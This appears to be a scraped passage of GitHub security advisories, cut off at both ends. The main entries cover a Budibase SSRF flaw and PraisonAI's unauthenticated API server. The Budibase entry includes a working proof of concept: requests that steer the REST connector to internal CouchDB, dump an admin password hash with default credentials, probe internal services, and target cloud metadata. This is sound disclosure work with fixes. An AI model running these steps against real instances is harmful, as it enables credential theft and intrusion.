  "details": "## 1. Summary\n\n| Field | Value |\n|-------|-------|\n| **Title** | SSRF via REST Connector with Empty Default Blacklist Leading to Full Internal Data Exfiltration |\n| **Product** | Budibase |\n| **Version** | 3.30.6 (latest stable as of 2026-02-25) |\n| **Component** | REST Datasource Integration + Backend-Core Blacklist Module |\n| **Severity** | Critical |\n| **Attack Vector** | Network |\n| **Privileges Required** | Low (Builder role, or QUERY WRITE for execution of pre-existing queries) |\n| **User Interaction** | None |\n| **Affected Deployments** | All self-hosted instances without explicit `BLACKLIST_IPS` configuration (believed to be the vast majority) |\n\n---\n\n## 2. Description\n\nA critical Server-Side Request Forgery (SSRF) vulnerability exists in Budibase\u0027s REST datasource connector. The platform\u0027s SSRF protection mechanism (IP blacklist) is rendered completely ineffective because the `BLACKLIST_IPS` environment variable is **not set by default** in any of the official deployment configurations. When this variable is empty, the blacklist function unconditionally returns `false`, allowing all requests through without restriction.\n\nThis allows any user with `Builder` privileges (or `QUERY WRITE` permission on an existing query) to create REST datasources pointing to arbitrary internal network services, execute queries against them, and fully exfiltrate the responses \u2014 including credentials, database contents, and internal service metadata.\n\nThe vulnerability is particularly severe because:\n1. The CouchDB backend stores all user credentials (bcrypt hashes), platform configurations, and application data\n2. CouchDB credentials are embedded in the environment variables visible to the application container\n3. A successful exploit grants full read/write access to the entire Budibase data layer\n\n---\n\n## 3. Root Cause Analysis\n\n### 3.1 Blacklist Implementation\n\n**File**: `packages/backend-core/src/blacklist/blacklist.ts`\n\n```typescript\n// Line 23-37: Blacklist refresh reads from environment variable\nexport async function refreshBlacklist() {\n  const blacklist = env.BLACKLIST_IPS           // \u2190 reads BLACKLIST_IPS\n  const list = blacklist?.split(\",\") || []       // \u2190 empty array if unset\n  let final: string[] = []\n  for (let addr of list) {\n    // ... resolves domains to IPs\n  }\n  blackListArray = final                         // \u2190 empty array\n}\n\n// Line 39-54: Blacklist check\nexport async function isBlacklisted(address: string): Promise\u003cboolean\u003e {\n  if (!blackListArray) {\n    await refreshBlacklist()\n  }\n  if (blackListArray?.length === 0) {\n    return false                                 // \u2190 ALWAYS returns false when empty\n  }\n  // ... rest of check never executes\n}\n```\n\n**Problem**: When `BLACKLIST_IPS` is not set (the default), `blackListArray` is initialized as an empty array, and `isBlacklisted()` unconditionally returns `false` for every URL.\n\n### 3.2 Default Configuration Missing BLACKLIST_IPS\n\n**File**: `hosting/.env` (official Docker Compose deployment template)\n\n```env\nMAIN_PORT=10000\nAPI_ENCRYPTION_KEY=testsecret\nJWT_SECRET=testsecret\nMINIO_ACCESS_KEY=budibase\nMINIO_SECRET_KEY=budibase\nCOUCH_DB_PASSWORD=budibase\nCOUCH_DB_USER=budibase\nREDIS_PASSWORD=budibase\nINTERNAL_API_KEY=budibase\n# ... (19 other variables)\n# BLACKLIST_IPS is NOT present\n```\n\nNo default private IP ranges (RFC1918, localhost, cloud metadata) are hardcoded as fallback.\n\n### 3.3 REST Integration Blacklist Check\n\n**File**: `packages/server/src/integrations/rest.ts`\n\n```typescript\n// Line 684-686: Blacklist check before fetch\nconst url = this.getUrl(path, queryString, pagination, paginationValues)\nif (await blacklist.isBlacklisted(url)) {     // \u2190 always false\n  throw new Error(\"Cannot connect to URL.\")   // \u2190 never reached\n}\n// Line 708:\nresponse = await fetch(url, input)             // \u2190 unrestricted fetch\n```\n\n### 3.4 Authorization Model\n\n| Operation | Endpoint | Required Permission |\n|-----------|----------|-------------------|\n| Create datasource | `POST /api/datasources` | `BUILDER` (app-level) |\n| Create query | `POST /api/queries` | `BUILDER` (app-level) |\n| Execute query | `POST /api/v2/queries/:id` | `QUERY WRITE` (can be granted to any app user) |\n\n**Route definitions**:\n- `packages/server/src/api/routes/datasource.ts:19` \u2192 `builderRoutes`\n- `packages/server/src/api/routes/query.ts:33` \u2192 `builderRoutes` (create)\n- `packages/server/src/api/routes/query.ts:55-66` \u2192 `writeRoutes` with `PermissionType.QUERY, PermissionLevel.WRITE` (execute)\n\n**Key insight**: The `BUILDER` role is an app-level permission, significantly lower than `GLOBAL_BUILDER` (platform admin). In multi-user environments, builders are expected to create app logic but are NOT expected to have access to infrastructure-level data.\n\n---\n\n## 4. Impact Analysis\n\n### 4.1 Confidentiality \u2014 Critical\n\nAn attacker can read:\n- **All CouchDB databases** (`/_all_dbs`)\n- **User credentials** including bcrypt password hashes, email addresses (`/global-db/_all_docs?include_docs=true`)\n- **Platform configuration** including encryption keys, JWT secrets\n- **All application data** across every app in the instance\n- **Internal service metadata** (MinIO storage, Redis)\n\n### 4.2 Integrity \u2014 High\n\nThrough CouchDB\u0027s HTTP API (which supports PUT/POST/DELETE), an attacker can:\n- **Modify user records** to escalate privileges\n- **Create new admin accounts** directly in CouchDB\n- **Alter application data** in any app\u0027s database\n- **Delete databases** causing data loss\n\n### 4.3 Availability \u2014 Medium\n\n- **Resource exhaustion** by making the server proxy large responses from internal services\n- **Database destruction** via CouchDB DELETE operations\n- **Service disruption** by modifying critical configuration documents\n\n### 4.4 Scope Change\n\nThe vulnerability crosses the security boundary between the Budibase application layer and the infrastructure layer. A `Builder` user should only be able to configure app-level logic, but this vulnerability grants direct access to:\n- CouchDB (database layer)\n- MinIO (storage layer)\n- Redis (cache/session layer)\n- Any other service accessible from the Docker network\n\n---\n\n## 5. Proof of Concept\n\n### 5.1 Environment Setup\n\n```bash\ncd hosting/\ndocker compose up -d\n# Wait for services to start\n# Create admin account via POST /api/global/users/init\n# Login to obtain session cookie\n```\n\n**Tested on**: Budibase v3.30.6, Docker Compose deployment with default `hosting/.env`\n\n### 5.2 Step 1 \u2014 Create REST Datasource Targeting Internal CouchDB\n\n```http\nPOST /api/datasources HTTP/1.1\nHost: localhost:10000\nContent-Type: application/json\nCookie: budibase:auth=\u003csession_token\u003e\nx-budibase-app-id: \u003capp_id\u003e\n\n{\n  \"datasource\": {\n    \"name\": \"Internal CouchDB\",\n    \"source\": \"REST\",\n    \"type\": \"datasource\",\n    \"config\": {\n      \"url\": \"http://couchdb-service:5984\",\n      \"defaultHeaders\": {}\n    }\n  }\n}\n```\n\n**Response** (201 \u2014 datasource created successfully):\n```json\n{\n  \"datasource\": {\n    \"_id\": \"datasource_4530e34a8b2e423f8f8eb53e2b2cefc6\",\n    \"name\": \"Internal CouchDB\",\n    \"source\": \"REST\",\n    \"config\": { \"url\": \"http://couchdb-service:5984\" }\n  }\n}\n```\n\nNo warning, no validation error \u2014 an internal hostname is accepted without restriction.\n\n### 5.3 Step 2 \u2014 Query CouchDB Version (Confirm Connectivity)\n\nCreate and execute a query to `GET /`:\n\n```http\nPOST /api/v2/queries/\u003cquery_id\u003e HTTP/1.1\n```\n\n**Response** \u2014 Internal CouchDB data returned to the attacker:\n```json\n{\n  \"data\": [{\n    \"couchdb\": \"Welcome\",\n    \"version\": \"3.3.3\",\n    \"git_sha\": \"40afbcfc7\",\n    \"uuid\": \"9cd97b58e2cef72e730a83247c377d2b\",\n    \"features\": [\"search\",\"access-ready\",\"partitioned\",\n                 \"pluggable-storage-engines\",\"reshard\",\"scheduler\"],\n    \"vendor\": {\"name\": \"The Apache Software Foundation\"}\n  }],\n  \"code\": 200,\n  \"time\": \"44ms\"\n}\n```\n\n### 5.4 Step 3 \u2014 Enumerate All Databases\n\nQuery: `GET /_all_dbs` with CouchDB admin credentials (from `.env`: `budibase:budibase`)\n\n```json\n{\n  \"data\": [\n    {\"value\": \"_replicator\"},\n    {\"value\": \"_users\"},\n    {\"value\": \"app_dev_3eeb8d7949074250ae62f206ad0b61a5\"},\n    {\"value\": \"app_dev_5135f7f368bc4701a7f163baaf22f1b7\"},\n    {\"value\": \"global-db\"},\n    {\"value\": \"global-info\"}\n  ]\n}\n```\n\n### 5.5 Step 4 \u2014 Exfiltrate User Credentials and Platform Secrets\n\nQuery: `GET /global-db/_all_docs?include_docs=true\u0026limit=20`\nHeaders: `Authorization: Basic YnVkaWJhc2U6YnVkaWJhc2U=` (budibase:budibase)\n\n**Response** \u2014 Full user record with bcrypt hash:\n```json\n{\n  \"data\": [{\n    \"total_rows\": 4,\n    \"rows\": [\n      {\n        \"id\": \"config_settings\",\n        \"doc\": {\n          \"_id\": \"config_settings\",\n          \"type\": \"settings\",\n          \"config\": {\n            \"platformUrl\": \"http://localhost:10000\",\n            \"uniqueTenantId\": \"23ba9844703049778d75372e720c7169_default\"\n          }\n        }\n      },\n      {\n        \"id\": \"us_09c5f0a89b7f40c19db863e1aaaf90fd\",\n        \"doc\": {\n          \"_id\": \"us_09c5f0a89b7f40c19db863e1aaaf90fd\",\n          \"email\": \"admin@test.com\",\n          \"password\": \"$2b$10$uQl69b/H22QnV61qZE2OmuChFAca43yicgorlJBwwNinJwQcOiPbK\",\n          \"builder\": {\"global\": true},\n          \"admin\": {\"global\": true},\n          \"tenantId\": \"default\",\n          \"status\": \"active\"\n        }\n      },\n      {\n        \"id\": \"usage_quota\",\n        \"doc\": {\n          \"_id\": \"usage_quota\",\n          \"quotaReset\": \"2026-03-01T00:00:00.000Z\",\n          \"usageQuota\": {\"apps\": 2, \"users\": 1, \"creators\": 1}\n        }\n      }\n    ]\n  }]\n}\n```\n\n**Exfiltrated data includes**:\n- Admin email: `admin@test.com`\n- Bcrypt password hash: `$2b$10$uQl69b/H22QnV61qZE2OmuChFAca43yicgorlJBwwNinJwQcOiPbK`\n- Role information: `builder.global: true`, `admin.global: true`\n- Tenant ID, platform URL, quota information\n\n### 5.6 Step 5 \u2014 Access Other Internal Services\n\n**MinIO (Object Storage)**:\n```\nDatasource URL: http://minio-service:9000\nResponse: {\"Code\":\"BadRequest\",\"Message\":\"An unsupported API call...\"}\nServer header: MinIO\n```\nConfirms MinIO is reachable. With proper S3 API signatures, bucket contents could be listed and files exfiltrated.\n\n**Redis (Port Scanning)**:\n```\nDatasource URL: http://redis-service:6379\nResponse: \"fetch failed\" (Redis speaks non-HTTP protocol)\n```\nDifferent error from non-existent host \u2192 confirms service discovery capability.\n\n**Non-existent service**:\n```\nDatasource URL: http://nonexistent-service:12345\nResponse: \"fetch failed\"\n```\n\n### 5.7 Service Discovery Matrix\n\n| Target | URL | Response | Service Confirmed |\n|--------|-----|----------|-------------------|\n| CouchDB | `http://couchdb-service:5984/` | `{\"couchdb\":\"Welcome\",\"version\":\"3.3.3\"}` | Yes \u2014 full data access |\n| MinIO | `http://minio-service:9000/` | XML error with `Server: MinIO` header | Yes \u2014 storage access |\n| Redis | `http://redis-service:6379/` | `socket hang up` / `fetch failed` | Yes \u2014 port open |\n| Non-existent | `http://nonexistent:12345/` | `fetch failed` (ENOTFOUND) | No \u2014 different error |\n\nThis differential response enables internal network mapping.\n\n---\n\n## 6. Attack Scenarios\n\n### Scenario A: Builder User Steals All Credentials\n1. User has `Builder` role for one app\n2. Creates REST datasource \u2192 `http://couchdb-service:5984`\n3. Queries `global-db` to get all user records with password hashes\n4. Cracks bcrypt hashes offline or directly modifies user records via CouchDB PUT\n\n### Scenario B: Chained with CVE-2026-25040 (Unpatched Privilege Escalation)\n1. Attacker has `Creator` role (lower than Builder)\n2. Exploits CVE-2026-25040 to invite themselves as Admin\n3. Now has Builder access \u2192 exploits this SSRF\n4. Complete instance takeover\n\n### Scenario C: Cloud Metadata Exfiltration (AWS/GCP/Azure)\n1. On cloud-hosted instances, datasource URL: `http://169.254.169.254/latest/meta-data/`\n2. Retrieves IAM credentials, instance metadata\n3. Pivots to cloud infrastructure\n\n---\n\n## 7. Affected Code Paths\n\n```\nUser Request\n    \u2502\n    \u25bc\nPOST /api/datasources                          [BUILDER permission]\n    \u2502  packages/server/src/api/routes/datasource.ts:32\n    \u2502  \u2192 No URL validation on datasource.config.url\n    \u25bc\nPOST /api/v2/queries/:queryId                  [QUERY WRITE permission]\n    \u2502  packages/server/src/api/routes/query.ts:63\n    \u25bc\npackages/server/src/threads/query.ts\n    \u2502  \u2192 Executes query via REST integration\n    \u25bc\npackages/server/src/integrations/rest.ts\n    \u2502  Line 684: blacklist.isBlacklisted(url)   \u2192 returns false (empty list)\n    \u2502  Line 708: fetch(url, input)              \u2192 unrestricted request\n    \u25bc\nInternal Service (CouchDB, MinIO, Redis, etc.)\n    \u2502\n    \u25bc\nResponse returned to attacker via query results\n```\n\n---\n\n## 8. Recommended Fixes\n\n### Fix 1 (Critical): Add Default Private IP Blocklist\n\n```typescript\n// packages/backend-core/src/blacklist/blacklist.ts\n\nconst DEFAULT_BLOCKED_RANGES = [\n  \"127.0.0.0/8\",       // localhost\n  \"10.0.0.0/8\",        // RFC1918\n  \"172.16.0.0/12\",     // RFC1918\n  \"192.168.0.0/16\",    // RFC1918\n  \"169.254.0.0/16\",    // link-local / cloud metadata\n  \"0.0.0.0/8\",         // current network\n  \"::1/128\",           // IPv6 localhost\n  \"fc00::/7\",          // IPv6 private\n  \"fe80::/10\",         // IPv6 link-local\n]\n\nexport async function isBlacklisted(address: string): Promise\u003cboolean\u003e {\n  // Always check against default blocked ranges\n  // even when BLACKLIST_IPS is not configured\n  const ips = await resolveToIPs(address)\n  for (const ip of ips) {\n    if (isInRange(ip, DEFAULT_BLOCKED_RANGES)) {\n      return true\n    }\n  }\n  // Then check user-configured blacklist\n  // ...existing logic...\n}\n```\n\n### Fix 2 (High): Validate Datasource URLs at Creation Time\n\n```typescript\n// packages/server/src/api/controllers/datasource.ts\n\nasync function save(ctx) {\n  const { config } = ctx.request.body.datasource\n  if (config?.url) {\n    if (await blacklist.isBlacklisted(config.url)) {\n      ctx.throw(400, \"Cannot create datasource targeting internal network\")\n    }\n  }\n  // ... existing logic\n}\n```\n\n### Fix 3 (Medium): Add DNS Rebinding Protection\n\nResolve the target hostname at request time and re-check the resolved IP against the blacklist, preventing DNS rebinding attacks where the first lookup returns a public IP but the actual request resolves to an internal IP.\n\n### Fix 4 (Medium): Disable HTTP Redirects or Re-validate After Redirect\n\nEnsure that if a response redirects to an internal IP, the redirect target is also checked against the blacklist.",
  "id": "GHSA-7r9j-r86q-7g45",
  "modified": "2026-04-03T21:34:44Z",
  "published": "2026-04-03T21:34:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/security/advisories/GHSA-7r9j-r86q-7g45"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31818"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/pull/18236"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/commit/5b0fe83d4ece52696b62589cba89ef50cc009732"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Budibase/budibase"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Budibase/budibase/releases/tag/3.33.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Budibase: Server-Side Request Forgery via REST Connector with Empty Default Blacklist"
}

GHSA-7VW7-45GR-9VPJ

Vulnerability from github – Published: 2022-05-13 01:06 – Updated: 2022-05-13 01:06
VLAI
Details

Arris Touchstone Telephony Gateway TG1682G 9.1.103J6 devices are distributed by some ISPs with a default password of "password" for the admin account that is used over an unencrypted http://192.168.0.1 connection, which might allow remote attackers to bypass intended access restrictions by leveraging access to the local network. NOTE: one or more user's guides distributed by ISPs state "At a minimum, you should set a login password."

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-10989"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-05-14T14:29:00Z",
    "severity": "MODERATE"
  },
  "details": "Arris Touchstone Telephony Gateway TG1682G 9.1.103J6 devices are distributed by some ISPs with a default password of \"password\" for the admin account that is used over an unencrypted http://192.168.0.1 connection, which might allow remote attackers to bypass intended access restrictions by leveraging access to the local network. NOTE: one or more user\u0027s guides distributed by ISPs state \"At a minimum, you should set a login password.\"",
  "id": "GHSA-7vw7-45gr-9vpj",
  "modified": "2022-05-13T01:06:01Z",
  "published": "2022-05-13T01:06:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10989"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/@AkshaySharmaUS/comcast-arris-touchstone-gateway-devices-are-vulnerable-heres-the-disclosure-7d603aa9342c"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7XW4-Q2JG-V79P

Vulnerability from github – Published: 2022-05-24 17:00 – Updated: 2022-05-24 17:00
VLAI
Details

In processPhonebookAccess of CachedBluetoothDevice.java, there is a possible permission bypass due to an insecure default value. This could lead to local information disclosure of the user's contact list with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-138529441

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-2197"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-11-13T18:15:00Z",
    "severity": "LOW"
  },
  "details": "In processPhonebookAccess of CachedBluetoothDevice.java, there is a possible permission bypass due to an insecure default value. This could lead to local information disclosure of the user\u0027s contact list with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-138529441",
  "id": "GHSA-7xw4-q2jg-v79p",
  "modified": "2022-05-24T17:00:49Z",
  "published": "2022-05-24T17:00:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-2197"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/security/bulletin/2019-11-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-83X9-MPVP-8R2X

Vulnerability from github – Published: 2022-05-13 01:19 – Updated: 2022-05-13 01:19
VLAI
Details

Lobby Track Desktop contains default administrative credentials. An attacker could exploit this vulnerability to gain full access to the application.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-17485"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-03-21T16:00:00Z",
    "severity": "HIGH"
  },
  "details": "Lobby Track Desktop contains default administrative credentials. An attacker could exploit this vulnerability to gain full access to the application.",
  "id": "GHSA-83x9-mpvp-8r2x",
  "modified": "2022-05-13T01:19:27Z",
  "published": "2022-05-13T01:19:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-17485"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/149645"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-8444-4FHQ-FXPQ

Vulnerability from github – Published: 2026-05-29 22:29 – Updated: 2026-05-29 22:29
VLAI
Summary
PraisonAI `deploy --type api` emits a Flask server with authentication disabled by default
Details

Summary

CVE-2026-44338 (GHSA-6rmh-7xcm-cpxj) documents that PraisonAI ships a code-generator (praisonai.deploy.api.generate_api_server_code) that emits a Flask API server with authentication disabled by default. Users who follow the documented quickstart (praisonai deploy --type api) get a server that:

  • binds to 0.0.0.0 per the recommended sample YAML
  • exposes /chat and /agents endpoints
  • runs praisonai.run() on user-supplied JSON input — LLM orchestration with the API key materials present in the process environment
  • does not require any authentication

The PyPI wheel praisonai==4.6.33 (current @latest) still ships the generator with auth_enabled defaulting to False. The fix shape is opt-in via APIConfig(auth_enabled=True, auth_token=...).

Details

Anchor (file:line:symbol)

  • Vulnerable artifact: praisonai==4.6.33 on PyPI.
  • Defaults: praisonai/deploy/models.py:29auth_enabled: bool = Field(default=False, ...); praisonai/deploy/models.py:30auth_token: Optional[str] = Field(default=None, ...).
  • Generator: praisonai/deploy/api.py:40AUTH_ENABLED = {config.auth_enabled}; api.py:41AUTH_TOKEN = {repr(config.auth_token)}; api.py:43-49def check_auth(): if not AUTH_ENABLED: return True.
  • CLI entry: documented as praisonai deploy --type api (vendor README); produces the generator output above with no flag required to suppress the warning, because no warning is emitted.

Vulnerable code (verbatim from installed wheel)

# praisonai/deploy/models.py (praisonai==4.6.33)
class APIConfig(BaseModel):
    host: str = Field(default="127.0.0.1", description="Server host")
    port: int = Field(default=8005, description="Server port")
    cors_enabled: bool = Field(default=True, description="Enable CORS")
    auth_enabled: bool = Field(default=False, description="Enable authentication")     # line 29
    auth_token: Optional[str] = Field(default=None, description="Authentication token") # line 30
# praisonai/deploy/api.py (praisonai==4.6.33)
code = f\'\'\'...
# Authentication
AUTH_ENABLED = {config.auth_enabled}      # False by default
AUTH_TOKEN   = {repr(config.auth_token)}  # None by default

def check_auth():
    if not AUTH_ENABLED:
        return True                       # short-circuit, accept all
    token = request.headers.get(\'Authorization\', \'\').replace(\'Bearer \', \'\')
    return token == AUTH_TOKEN
...
\'\'\'

A default invocation of the deploy command emits a server whose check_auth() short-circuits to True and accepts unauthenticated /chat, /agents POSTs.

PoC

#!/usr/bin/env python3
"""
legend-c420 PoC - PraisonAI 4.6.33 generates Flask API server with auth
disabled by default. Class H sibling of CVE-2026-44338.

Phase 1: reflect on praisonai.deploy.models.APIConfig defaults.
Phase 2: call generate_api_server_code(default config) and assert the
         emitted source contains AUTH_ENABLED = False and the
         short-circuit return.
Phase 3: re-run with auth_enabled=True, auth_token='s3cret-bearer-value'
         and confirm the emitted source flips to the secure shape.

Exit code 0 = PASS = vulnerable defaults confirmed.
"""
import sys, traceback

def phase1_dataclass_defaults():
    print("PHASE 1 - praisonai.deploy.models.APIConfig default values")
    from praisonai.deploy.models import APIConfig
    cfg = APIConfig()
    checks = [
        ("auth_enabled", cfg.auth_enabled, False),
        ("auth_token",   cfg.auth_token,   None),
    ]
    for name, observed, expected in checks:
        ok = observed == expected
        mark = "VULNERABLE" if name in ("auth_enabled","auth_token") and ok else "ok"
        print(f"  {name:14s} = {observed!r:18s}  (expected {expected!r})  [{mark}]")
        assert ok
    print("  >> APIConfig defaults reproduce the CVE-2026-44338 shape.")

def phase2_default_generator_emits_unauth():
    print("PHASE 2 - generate_api_server_code(default config) emits unauth server")
    from praisonai.deploy.models import APIConfig
    from praisonai.deploy.api import generate_api_server_code
    src = generate_api_server_code("agents.yaml", config=APIConfig())
    for needle in ["AUTH_ENABLED = False","AUTH_TOKEN = None","if not AUTH_ENABLED:","return True"]:
        assert needle in src, f"missing: {needle!r}"
        print(f"  [FOUND] {needle!r}")
    print("  >> Default-config generator emits Flask server with check_auth() short-circuit.")

def phase3_fix_shape_available():
    print("PHASE 3 - auth_enabled=True flips to secure shape")
    from praisonai.deploy.models import APIConfig
    from praisonai.deploy.api import generate_api_server_code
    cfg = APIConfig(auth_enabled=True, auth_token="s3cret-bearer-value")
    src = generate_api_server_code("agents.yaml", config=cfg)
    assert "AUTH_ENABLED = True" in src
    assert "AUTH_ENABLED = False" not in src
    print("  >> Fix shape works when toggled. Class H confirmed: default is insecure.")

def main():
    print("=" * 64)
    print("legend-c420 PoC - PraisonAI default-config AUTH_ENABLED=False")
    print("=" * 64)
    try:
        phase1_dataclass_defaults()
        phase2_default_generator_emits_unauth()
        phase3_fix_shape_available()
    except Exception:
        traceback.print_exc()
        print("FAIL"); sys.exit(2)
    print("PASS 3/3 phases. EXIT 0.")
    sys.exit(0)

if __name__ == "__main__":
    main()

PoC dependencies: praisonai==4.6.33 from PyPI. Tested on Python 3.11.

Run log verdict: PASS 3/3 phases. EXIT 0. — vulnerable-default shape confirmed. auth_enabled=False by default, check_auth() short-circuits to True, fix toggle exists but is opt-in.

Impact

An operator who runs the vendor-documented quickstart (pip install praisonai && praisonai deploy --type api) gets a network-reachable Flask server that invokes praisonai.run() on attacker-supplied JSON with the user's LLM API keys in the process environment. The attacker reaches arbitrary LLM-orchestration (including any tool-use the agents define, which in PraisonAI commonly includes python_repl, bash, file I/O, and HTTP calls), with the host's API-key credit billed to the operator.

  • Belief: CVE-2026-44338 was filed and triaged.
  • Reality: praisonai==4.6.33 is current @latest on PyPI (2026-05-16). The generator still defaults to auth_enabled=False.
  • Gap: The CVE acknowledges the fix shape exists. The fix is opt-in. The default-config consumer remains vulnerable.

Parent CVE: CVE-2026-44338 / GHSA-6rmh-7xcm-cpxj

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.6.39"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "PraisonAI"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.6.40"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-47393"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188",
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-29T22:29:20Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nCVE-2026-44338 (GHSA-6rmh-7xcm-cpxj) documents that PraisonAI ships a code-generator (`praisonai.deploy.api.generate_api_server_code`) that emits a Flask API server with authentication disabled by default. Users who follow the documented quickstart (`praisonai deploy --type api`) get a server that:\n\n- binds to `0.0.0.0` per the recommended sample YAML\n- exposes `/chat` and `/agents` endpoints\n- runs `praisonai.run()` on user-supplied JSON input \u2014 LLM orchestration with the API key materials present in the process environment\n- does not require any authentication\n\nThe PyPI wheel `praisonai==4.6.33` (current `@latest`) still ships the generator with `auth_enabled` defaulting to `False`. The fix shape is opt-in via `APIConfig(auth_enabled=True, auth_token=...)`.\n\n### Details\n\n**Anchor (file:line:symbol)**\n\n- Vulnerable artifact: `praisonai==4.6.33` on PyPI.\n- Defaults: `praisonai/deploy/models.py:29` \u2014 `auth_enabled: bool = Field(default=False, ...)`; `praisonai/deploy/models.py:30` \u2014 `auth_token: Optional[str] = Field(default=None, ...)`.\n- Generator: `praisonai/deploy/api.py:40` \u2014 `AUTH_ENABLED = {config.auth_enabled}`; `api.py:41` \u2014 `AUTH_TOKEN = {repr(config.auth_token)}`; `api.py:43-49` \u2014 `def check_auth(): if not AUTH_ENABLED: return True`.\n- CLI entry: documented as `praisonai deploy --type api` (vendor README); produces the generator output above with no flag required to suppress the warning, because no warning is emitted.\n\n**Vulnerable code (verbatim from installed wheel)**\n\n```python\n# praisonai/deploy/models.py (praisonai==4.6.33)\nclass APIConfig(BaseModel):\n    host: str = Field(default=\"127.0.0.1\", description=\"Server host\")\n    port: int = Field(default=8005, description=\"Server port\")\n    cors_enabled: bool = Field(default=True, description=\"Enable CORS\")\n    auth_enabled: bool = Field(default=False, description=\"Enable authentication\")     # line 29\n    auth_token: Optional[str] = Field(default=None, description=\"Authentication token\") # line 30\n```\n\n```python\n# praisonai/deploy/api.py (praisonai==4.6.33)\ncode = f\\\u0027\\\u0027\\\u0027...\n# Authentication\nAUTH_ENABLED = {config.auth_enabled}      # False by default\nAUTH_TOKEN   = {repr(config.auth_token)}  # None by default\n\ndef check_auth():\n    if not AUTH_ENABLED:\n        return True                       # short-circuit, accept all\n    token = request.headers.get(\\\u0027Authorization\\\u0027, \\\u0027\\\u0027).replace(\\\u0027Bearer \\\u0027, \\\u0027\\\u0027)\n    return token == AUTH_TOKEN\n...\n\\\u0027\\\u0027\\\u0027\n```\n\nA default invocation of the deploy command emits a server whose `check_auth()` short-circuits to `True` and accepts unauthenticated `/chat`, `/agents` POSTs.\n\n### PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nlegend-c420 PoC - PraisonAI 4.6.33 generates Flask API server with auth\ndisabled by default. Class H sibling of CVE-2026-44338.\n\nPhase 1: reflect on praisonai.deploy.models.APIConfig defaults.\nPhase 2: call generate_api_server_code(default config) and assert the\n         emitted source contains AUTH_ENABLED = False and the\n         short-circuit return.\nPhase 3: re-run with auth_enabled=True, auth_token=\u0027s3cret-bearer-value\u0027\n         and confirm the emitted source flips to the secure shape.\n\nExit code 0 = PASS = vulnerable defaults confirmed.\n\"\"\"\nimport sys, traceback\n\ndef phase1_dataclass_defaults():\n    print(\"PHASE 1 - praisonai.deploy.models.APIConfig default values\")\n    from praisonai.deploy.models import APIConfig\n    cfg = APIConfig()\n    checks = [\n        (\"auth_enabled\", cfg.auth_enabled, False),\n        (\"auth_token\",   cfg.auth_token,   None),\n    ]\n    for name, observed, expected in checks:\n        ok = observed == expected\n        mark = \"VULNERABLE\" if name in (\"auth_enabled\",\"auth_token\") and ok else \"ok\"\n        print(f\"  {name:14s} = {observed!r:18s}  (expected {expected!r})  [{mark}]\")\n        assert ok\n    print(\"  \u003e\u003e APIConfig defaults reproduce the CVE-2026-44338 shape.\")\n\ndef phase2_default_generator_emits_unauth():\n    print(\"PHASE 2 - generate_api_server_code(default config) emits unauth server\")\n    from praisonai.deploy.models import APIConfig\n    from praisonai.deploy.api import generate_api_server_code\n    src = generate_api_server_code(\"agents.yaml\", config=APIConfig())\n    for needle in [\"AUTH_ENABLED = False\",\"AUTH_TOKEN = None\",\"if not AUTH_ENABLED:\",\"return True\"]:\n        assert needle in src, f\"missing: {needle!r}\"\n        print(f\"  [FOUND] {needle!r}\")\n    print(\"  \u003e\u003e Default-config generator emits Flask server with check_auth() short-circuit.\")\n\ndef phase3_fix_shape_available():\n    print(\"PHASE 3 - auth_enabled=True flips to secure shape\")\n    from praisonai.deploy.models import APIConfig\n    from 